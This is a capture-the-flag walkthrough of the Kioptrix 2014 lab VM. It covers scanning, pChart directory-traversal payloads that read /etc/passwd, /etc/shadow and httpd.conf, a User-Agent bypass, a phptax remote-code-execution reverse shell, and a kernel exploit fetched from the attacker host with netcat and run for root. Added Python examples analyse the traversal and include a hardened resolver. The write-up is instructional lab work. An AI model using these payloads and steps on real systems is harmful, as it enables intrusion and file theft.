VulnHub: Kioptrix: 2014

Link: https://www.vulnhub.com/entry/kioptrix-2014-5,62/

1. Network Discovery

nmap -sn 10.0.2.24/24

The target IP is 10.0.2.20.

2. Port scan

nmap -Pn 10.0.2.20

Two ports are open: 80 and 8080.

3. OS and service scan

nmap -A -p22,80,8080 10.0.2.20

Both ports serve HTTP.

4. Vuln scan

nmap --script vuln -p22,80,8080 10.0.2.20

The vuln scripts turned up nothing further of use.

5. Nikto scan

Port 80

nikto -h http://10.0.2.20

Nikto flagged the server as possibly vulnerable to a remote buffer overflow.

Port 8080

nikto -h http://10.0.2.20:8080

The result was similar to port 80’s.

6. Directory scan

Port 80

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.20/ -x php,txt,html,sh,cgi -q

/index.html

Port 8080

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.20:8080/ -x php,txt,html,sh,cgi -q

Every path came back with a 403 Forbidden.

7. Exploit w/ mod_ssl

I came across this script:

heltonWernik/OpenLuck (github.com): a cleaned-up version of the OpenFuck mod_ssl exploit, https://www.exploit-db.com/exploits/764/

From the previous Nikto scan:

Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8

The script has no target matching this version (its offset table covers the old Apache 1.3.x / mod_ssl 2.8.x builds, not Apache 2.2 with mod_ssl 2.2.21), so I'll have to try another way.

8. Accessing HTTP site

Start w/ port 80

View page source -> pChart2.1.3

Accessing port 8080

Viewing page source showed nothing

Back on port 80, I googled pChart2.1.3 and found the Exploit-DB entry:

Exploit-DB: pChart 2.1.3 Directory Traversal and Reflected XSS (Balazs Makany, 2014-01-24), www.exploit-db.com

Starting w/ Directory Traversal

Test the exploit: access pChart, intercept the request with Burp Suite, and send it to the Repeater.

http://10.0.2.20/pChart2.1.3/examples/index.php

Then change the Script parameter to a traversal path:

/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/shadow

The web server's user has no permission to read this file.

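The traversal above works because the decoded Script value starts with "/", so whatever directory pChart prepends is discarded; a relative "../" chain would instead have to match the directory depth exactly. As an added example (not code from the write-up or from pChart), the following Python decodes the parameter the way the web server does, shows where the vulnerable resolution lands, and contrasts it with a hardened resolver that pins every request inside the examples directory. The EXAMPLES_DIR path is an assumption for the demo.

```python
"""Decode a pChart-style 'Script=' value and contrast vulnerable vs. hardened resolution.

Added example, not part of the original write-up or of pChart.
EXAMPLES_DIR is an assumed location of the examples directory on the target.
"""
import os
from urllib.parse import unquote

# Assumed document root of the pChart examples directory (illustrative only).
EXAMPLES_DIR = "/usr/local/www/apache22/data/pChart2.1.3/examples"


def decode_param(value, max_rounds=3):
    """Percent-decode repeatedly (bounded) so a double-encoded %252f is also caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_script(script, base=EXAMPLES_DIR):
    """What the vulnerable code would open: join and normalise, no containment check.

    os.path.join drops the base entirely when the decoded value starts with '/',
    which is exactly what '/../../etc/passwd' does, so depth never matters.
    """
    decoded = decode_param(script)
    return os.path.normpath(os.path.join(base, decoded))


def safe_resolve_script(script, base=EXAMPLES_DIR):
    """Hardened version: force the value to be relative, resolve, then require
    the result to stay under base. Returns the path or None when rejected."""
    decoded = decode_param(script)
    if "\x00" in decoded:                      # reject NUL-truncation tricks
        return None
    candidate = os.path.normpath(os.path.join(base, decoded.lstrip("/")))
    base = os.path.normpath(base)
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:                         # mixed absolute/relative paths
        return None
    return candidate if inside else None


if __name__ == "__main__":
    payloads = (
        "Example01.php",                       # legitimate request
        "%2f..%2f..%2fetc/passwd",             # the write-up's payload
        "..%2f..%2f..%2fetc%2fpasswd",         # relative chain: lands at the wrong depth
        "%252f..%252f..%252fetc/passwd",       # double-encoded variant
    )
    for p in payloads:
        print(f"{p!r:38} vulnerable -> {resolve_script(p)}")
        print(f"{'':38} hardened   -> {safe_resolve_script(p)}")
```

The relative variant in the demo resolves three levels above the examples directory rather than to /etc/passwd, which is why the Exploit-DB payload leads with an encoded slash. The hardened resolver rejects all three traversal forms while still serving Example01.php.
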
Back on port 8080, I suspected the 403 Forbidden was caused by my User-Agent header.

On FreeBSD the Apache configuration lives in

/usr/local/etc/apache22/httpd.conf

so I read it with the same traversal, substituting that path for /etc/passwd in the Script parameter.

Success!!!

Reading through the file showed that the port-8080 site only admits clients whose User-Agent identifies as Mozilla/4.0.

I used this list of user-agent strings:

Link: https://gist.github.com/pzb/b4b6f57144aea7827ae4

With a user-agent switcher add-on in Firefox set to a Mozilla/4.0 string, I could access the site.

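The gate behaves like an Apache SetEnvIf rule anchored at the start of the User-Agent header: a modern browser's "Mozilla/5.0 ...", gobuster's default agent and curl's default all fail, which is why the directory scan above saw nothing but 403s. As an added example (not from the write-up or the target's httpd.conf), the following Python reproduces that check with an assumed regex and shows how to build a request that passes it; the candidate agent strings are constructed for the demo.

```python
"""Reproduce the port-8080 User-Agent gate and build a request that passes it.

Added example, not code from the original write-up. The '^Mozilla/4\\.0' regex is an
assumption standing in for the Apache SetEnvIf rule found in httpd.conf; the candidate
agents below are constructed, not captured from the target.
"""
import re
import urllib.request

# Assumed equivalent of the Apache rule that sets the env var the vhost allows on.
UA_GATE = re.compile(r"^Mozilla/4\.0")

# Constructed User-Agent strings a tester is likely to send.
CANDIDATE_AGENTS = {
    "firefox":   "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
    "curl":      "curl/8.4.0",
    "gobuster":  "gobuster/3.6",
    "ie8":       "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
    "bare":      "Mozilla/4.0",
    "lowercase": "mozilla/4.0 (compatible)",   # SetEnvIf is case-sensitive by default
}


def passes_gate(user_agent):
    """True when the anchored match succeeds, i.e. Apache would allow the request."""
    return UA_GATE.search(user_agent) is not None


def agents_that_pass(agents=CANDIDATE_AGENTS):
    """Names of the candidate agents the gate accepts, sorted for stable output."""
    return sorted(name for name, ua in agents.items() if passes_gate(ua))


def build_request(url, user_agent):
    """Build (but do not send) a GET carrying the chosen User-Agent.

    urllib's default is 'Python-urllib/3.x', which the gate rejects.
    """
    return urllib.request.Request(url, headers={"User-Agent": user_agent})


def fetch(url, user_agent, timeout=5):
    """Send the request and return (status, body). Network call; not used by the tests."""
    with urllib.request.urlopen(build_request(url, user_agent), timeout=timeout) as resp:
        return resp.status, resp.read()


if __name__ == "__main__":
    for name, ua in CANDIDATE_AGENTS.items():
        print(f"{name:10} {'allowed' if passes_gate(ua) else '403    '}  {ua}")
    req = build_request("http://10.0.2.20:8080/", CANDIDATE_AGENTS["ie8"])
    print("User-Agent sent:", req.get_header("User-agent"))
```

The same fix applies to the tools used earlier: gobuster accepts a custom agent with -a/--useragent and curl with -A, so the port-8080 directory scan can be rerun with a Mozilla/4.0 string instead of the default.
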
It’s phptax.

Viewing page source revealed nothing

Googling for a phptax exploit led to the Exploit-DB entry:

Exploit-DB: phptax 0.8 - Remote Code Execution (webapps exploit, PHP platform), www.exploit-db.com

I set up a listener for the reverse shell on port 1234. The payload came from swisskyrepo/PayloadsAllTheThings (github.com), a list of useful payloads and bypasses for web application security and pentest/CTF work.

I succeeded using one of its reverse-shell one-liners.

Edit the IP and URL-encode the command with Burp Suite.

The modified exploit string with the encoded reverse-shell command:

Pasting it into the browser gave me a shell.

9. Privilege escalation

Verify user

whoami

Searching for passwords in

/home, /tmp, /var/mail, /var/log

turned up no usernames or passwords.

Verify /etc/passwd permission

Verify /etc/shadow permission

Verify sudo

sudo -l

Verify SUID

find / -perm -u=s -type f 2>/dev/null

Nothing that I can use.

Verify capabilities

getcap -r / 2>/dev/null

(getcap is a Linux tool; FreeBSD has no file-capability equivalent, so this check does not apply here.)

Verify cron

cat /etc/crontab

Nothing that I can use.

Verify kernel

uname -a

Googling the kernel version, I found 3 scripts.

I tried the first script:

searchsploit -m 28718

Start an HTTP server on the attacker machine:

python -m SimpleHTTPServer 80

(Python 2 syntax; on a current attacker box the equivalent is python3 -m http.server 80.)

Change to /tmp on the target machine to store the file:

cd /tmp

The target has no wget. (FreeBSD does not ship wget; its base system has fetch(1) instead.)

I'll transfer it with netcat instead.

On the attacker machine:

nc -nvlp 1337 < 28718.c

On the target machine:

nc -nv 10.0.2.7 1337 > priv.c

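The two netcat commands above are a one-shot TCP push: the listener's stdin is the file, the receiver's stdout is the destination, and the transfer is complete when the sender closes its side. As an added example (not from the write-up), the following Python reproduces that listener/receiver pair over loopback with plain sockets so it can be run offline, and adds the check the write-up skips: a SHA-256 comparison of both copies before compiling. The file bytes are constructed here; nothing is read from a real target.

```python
"""Netcat-style one-shot file push (nc -nvlp PORT < file | nc -nv HOST PORT > file)
with an integrity check.

Added example, not from the original write-up. SAMPLE_SOURCE is a constructed
stand-in for 28718.c; the transfer runs over 127.0.0.1 on an ephemeral port.
"""
import hashlib
import socket
import threading

# Constructed stand-in for the exploit source; any bytes will do.
SAMPLE_SOURCE = b'#include <stdio.h>\nint main(void){puts("stand-in for 28718.c");return 0;}\n'


def sha256_hex(data):
    """Hex digest used to compare the two copies (sha256sum on Linux, sha256 on FreeBSD)."""
    return hashlib.sha256(data).hexdigest()


def serve_once(data, host="127.0.0.1", port=0):
    """Attacker side, like 'nc -nvlp PORT < file': accept one client, send, close.

    Returns (bound_port, thread); port=0 lets the OS pick a free port.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    bound_port = srv.getsockname()[1]

    def _run():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(data)
            conn.shutdown(socket.SHUT_WR)   # EOF is what tells the receiver "file complete"
        srv.close()

    thread = threading.Thread(target=_run, daemon=True)
    thread.start()
    return bound_port, thread


def receive_all(host, port, timeout=5.0):
    """Target side, like 'nc -nv HOST PORT > file': read until the sender closes."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as conn:
        while True:
            chunk = conn.recv(65536)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


def transfer_and_verify(data=SAMPLE_SOURCE):
    """Run both ends over loopback; return (received_bytes, hashes_match)."""
    port, thread = serve_once(data)
    received = receive_all("127.0.0.1", port)
    thread.join(timeout=5.0)
    return received, sha256_hex(received) == sha256_hex(data)


if __name__ == "__main__":
    got, ok = transfer_and_verify()
    print(f"received {len(got)} bytes, sha256 match: {ok}")
```

With real netcat the sending side does not always close after its stdin hits EOF, so the receiving nc can sit waiting; the OpenBSD netcat on Kali has -N to shut down the socket after EOF, otherwise Ctrl-C once the byte count stops growing. Either way, compare sha256sum 28718.c on the attacker with sha256 priv.c on the FreeBSD target before compiling a kernel exploit from it.
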
Compile:

gcc priv.c -o priv

Run the compiled exploit:

./priv

Now I’m root.

cd /root

cat congrats.txt

ratiros01

Mar 12


This article was published by 泓源视野 (author: admin) and its copyright belongs to 泓源视野. The content reflects the author's personal views and does not imply that 泓源视野 agrees with or endorses them. Please credit the source when reposting.